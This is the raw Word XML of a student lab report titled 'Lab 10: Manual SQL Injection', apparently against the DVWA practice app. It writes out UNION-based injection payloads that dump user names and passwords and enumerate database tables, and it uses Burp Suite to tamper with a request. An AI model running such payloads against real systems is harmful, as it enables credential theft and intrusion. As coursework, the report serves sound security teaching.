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06A" w14:textId="77777777" w:rsidR="008761EB" w:rsidRDefault="00925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1CF21444" w14:textId="515C8B3A" w:rsidR="00EF7CE6" w:rsidRDefault="000C66B7" w:rsidP="00EF7CE6">
            <w:r>
              <w:t>CES202</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E002FFA" w14:textId="56289715" w:rsidR="00EF7CE6" w:rsidRDefault="007C7A11" w:rsidP="00EF7CE6">
            <w:r>
              <w:t>Lab 10: Manual SQL Injection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4B6EFDA7" w:rsidR="009E0AE3" w:rsidRDefault="007C7A11">
            <w:r>
              <w:t>Nguyễn Đức Kiên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53293E8A" w:rsidR="009E0AE3" w:rsidRDefault="007C7A11">
            <w:r>
              <w:t>HE141763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59829553" w:rsidR="009E0AE3" w:rsidRDefault="007C7A11">
            <w:r>
              <w:t>8.14AM October 6, 2020</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="723E9EE2" w14:textId="77777777" w:rsidR="009E0AE3" w:rsidRDefault="009E0AE3"/>
    <w:p w14:paraId="15453867" w14:textId="63FD3325" w:rsidR="007C7A11" w:rsidRDefault="003B52AB" w:rsidP="007C7A11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 w:rsidRPr="003B52AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Exercise 1.</w:t>
      </w:r>
      <w:r w:rsidR="007C7A11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> Security level: Low</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53009A7F" w14:textId="4CB650E5" w:rsidR="007C7A11" w:rsidRDefault="007C7A11" w:rsidP="007C7A11">
      <w:r>
        <w:t xml:space="preserve">Query used: </w:t>
      </w:r>
      <w:r>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’ </w:t>
      </w:r>
      <w:r>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>union</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>null,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>concat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094A3CC2" w14:textId="23A63273" w:rsidR="007C7A11" w:rsidRDefault="007C7A11" w:rsidP="007C7A11">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39EA33A1" wp14:editId="166435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EA2" w14:textId="1D6B1140" w:rsidR="006A17F2" w:rsidRDefault="006A17F2"/>
    <w:p w14:paraId="7462E68F" w14:textId="18DE0C0F" w:rsidR="00C7618D" w:rsidRDefault="007C7A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</w:t>
      </w:r>
      <w:r w:rsidR="00C7618D" w:rsidRPr="00C110EB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.</w:t>
      </w:r>
      <w:r w:rsidR="00C7618D" w:rsidRPr="00C110E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Security level: Medium</w:t>
      </w:r>
      <w:r w:rsidR="00C7618D" w:rsidRPr="00C110EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BAD070" w14:textId="77777777" w:rsidR="00E94F6E" w:rsidRDefault="00E94F6E">
      <w:r>
        <w:t>In this section, we use burpsuite to manipulate the post method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA04D3B" w14:textId="77777777" w:rsidR="00E94F6E" w:rsidRDefault="00E94F6E">
      <w:r>
        <w:t>Screenshot 1: select id 2 and submit, when catching it with burpsuite we have</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BFE5A2" w14:textId="77777777" w:rsidR="00E94F6E" w:rsidRDefault="00E94F6E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63536DE4" wp14:editId="2DFD1E4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901" w14:textId="5811DADD" w:rsidR="007C7A11" w:rsidRDefault="00E94F6E">
      <w:r>
        <w:t xml:space="preserve">Screenshot 2: </w:t>
      </w:r>
      <w:r w:rsidR="007C7A11">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009253BD">
        <w:t>edit the payload we send</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF883F4" w14:textId="77777777" w:rsidR="009253BD" w:rsidRDefault="009253BD">
      <w:r>
        <w:t>Query used (add after id=1): or 1 = 1 union select null, table_name from information_schema.tables#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40063151" w14:textId="544B6BA1" w:rsidR="009253BD" w:rsidRDefault="009253BD">
      <w:r>
        <w:t>This query will give all table information</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33910C31" wp14:editId="4885AA6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DAC0" w14:textId="544ED42B" w:rsidR="009253BD" w:rsidRDefault="009253BD">
      <w:r>
        <w:t>Screenshot 3: we have the result when press forward</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2E61E4" w14:textId="34B1AE3F" w:rsidR="009253BD" w:rsidRDefault="009253BD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F766BC0" wp14:editId="2232AD3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B4606" w14:textId="77777777" w:rsidR="009253BD" w:rsidRDefault="009253BD"/>
    <w:p w14:paraId="77005B44" w14:textId="4AE71DC4" w:rsidR="009253BD" w:rsidRDefault="009253BD"/>
    <w:sectPr w:rsidR="0092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C66B7"/>
    <w:rsid w:val="000D5D0C"/>
    <w:rsid w:val="00114D5F"/>
    <w:rsid w:val="00192215"/>
    <w:rsid w:val="002644F3"/>
    <w:rsid w:val="002D6C11"/>
    <w:rsid w:val="002F5321"/>
    <w:rsid w:val="003B52AB"/>
    <w:rsid w:val="003F6E66"/>
    <w:rsid w:val="00562298"/>
    <w:rsid w:val="00572197"/>
    <w:rsid w:val="006967A5"/>
    <w:rsid w:val="006A17F2"/>
    <w:rsid w:val="007559DC"/>
    <w:rsid w:val="007C7A11"/>
    <w:rsid w:val="008A7CB3"/>
    <w:rsid w:val="00910A4F"/>
    <w:rsid w:val="009253BD"/>
    <w:rsid w:val="00980F38"/>
    <w:rsid w:val="009E0AE3"/>
    <w:rsid w:val="00BC3BAB"/>
    <w:rsid w:val="00C7618D"/>
    <w:rsid w:val="00D204C7"/>
    <w:rsid w:val="00DC7981"/>
    <w:rsid w:val="00E46306"/>
    <w:rsid w:val="00E94F6E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Kien Nguyen</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-10-06T01:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-10-06T01:46:00Z</dcterms:modified>
</cp:coreProperties>
</file>